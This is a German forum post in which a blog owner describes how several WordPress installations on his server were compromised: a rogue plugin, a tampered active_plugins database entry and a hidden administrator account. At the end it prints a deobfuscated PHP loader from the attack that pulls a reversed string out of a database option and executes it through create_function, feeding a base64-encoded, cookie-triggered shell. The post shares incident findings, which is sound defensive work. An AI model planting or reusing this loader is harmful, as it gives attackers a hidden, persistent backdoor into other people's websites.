Guten Abend,
ich bin der Autor des hier genannten - und gehackten - Blogs. Vielleicht kann ich hier einige Dinge zu diesem Hack klarstellen.
1. Spamkarma ist nicht das Einfallstor gewesen, das
Plugin hat sich nur zufällig in das Verzeichnis eingenistet. Ich weiß das, weil andere befallene Wordpress Installationen auf dem gleichen Server, das "Plugin" (also den Hack) in anderen Verzeichnissen liegen hatten.
2. Wegen der anderen Wordpress Installationen auf unserem Server, die zum Großen Teil noch nicht die aktuelle Wordpress Version benutzen, bin ich mir nicht sicher, ob der Fehler tatsächlich auch ein Problem von 2.7 ist. Möglicherweise sucht ein infiziertes Wordpress nach anderen Installationen auf dem Server und infiziert sie über das Dateisystem (bei uns sind alle Webverzeichnisse durch den Webserver les- und schreibbar). Allerdings wurde bei mir ganz sicher der Eintrag "active_plugins" in der Datenbanktabelle wp_options manipuliert, was wiederum gegen diese Theorie spricht, da das nicht über das Dateisystem bewerkstelligt werden kann.
3. Ein Blog auf unserem Server hatte ebenfalls die schadhafte Datei im Pluginverzeichnis, allerdings keine ungewöhnlichen Einträge in der
Datenbank. Das Blog ist privat und von außen durch einen
.htaccess Passwortschutz geschützt.
4. Mal abgesehen davon, dass so ein Exploit nicht möglich sein sollte, sollte Wordpress vielleicht doch alle
Plugins anzeigen, die es mittels active_plugins lädt statt nur die
Plugins, die es im Dateisystem findet. Bei mir wurde außerdem ein Adminuser angelegt, der nicht in der normalen Userliste auftauchte, sondern nur, wenn man einen Benutzer löscht. Dort gibt es dann eine Abfrage wem die Artikel zugewiesen werden sollen und dort tauchte der versteckte User auf. Auch das sollte nicht passieren können.
5. Die automatische Updatefunktion läuft bei mir über
FTP und nur mit dem
FTP-Passwort. Das sollte kein Sicherheitsproblem sein, oder?
Falls ihr noch Fragen habt, ich habe den Thread abonniert. Nur zu.
Für mich war das ganze sehr ärgerlich, weil ich es erst bemerkt habe als Google mich schon aus dem Index bzw. ganz weit nach hinten geschubst hat. An Hand der
Logdateien auf unserem Server konnte ich leider nicht feststellen wie das passieren konnte. Zum fraglichen Zeitpunkt (Datum der Plugindatei) ist nichts ungewöhnliches zu sehen ...
P.S.:
Noch ein paar Links.
Ein Blog, das scheinbar dem gleichen Exploit zum Opfer gefallen ist:
Mediengestalter Blog gehackt und keiner hats gemerkt (Wordpress Exploit)
Noch eines:
Wordpress exploit: we been hit by hidden spam link injection Linux by Examples
Hier eine ausführlichere Beschreibung:
Wordpress Exploit: wordpress_options (etwas länger her)
Und dann habe ich noch einen Exploitcode für ein altes Wordpress-MU gefunden, der aber genau das macht was bei mir passiert ist, die Manipulation von "active_plugins":
Wordpress MU < 1.3.2 active_plugins option Code Execution Exploit
P.P.S.: Der Code des Hack-
Plugins, das ich bei mir gefunden habe. Die Datei ist exakt 48993 Bytes groß.
Eine zweite Datei war ebenfalls noch dabei, die mit PHP-Kommentaren zur Verwirrung zugepflastert war. Ohne Kommentare schaut es so aus:
PHP-Code:
<?php
global $wpdb;
$trp_rss=$wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name='rss_f541b3abd05e7962fcab37737f40fad8'");
preg_match("!events or a cale\"\;s\:7\:\'(.*?)\'!is",$trp_rss,$trp_m);
$trp_f=create_function("",strrev($trp_m[1]));
$trp_f();
?>
In der dortigen option stand diverses und ein String, der mit obiger Funktion in create_function verwendet wird. Darin wird ein base64 kodierter String dekodiert und evaluiert, der dann den eigentlichen Hack-Code enthält (Datei im Anhang). Scheinbar eine Art Shell, die bei Vorhanden sein bestimmter Cookies aktiv wird.
Mehr weiß ich jetzt noch nicht ... Insgesamt sieht es sehr ähnlich wie der Code auf der oben verlinkten Seite (
Wordpress Exploit: wordpress_options) aus.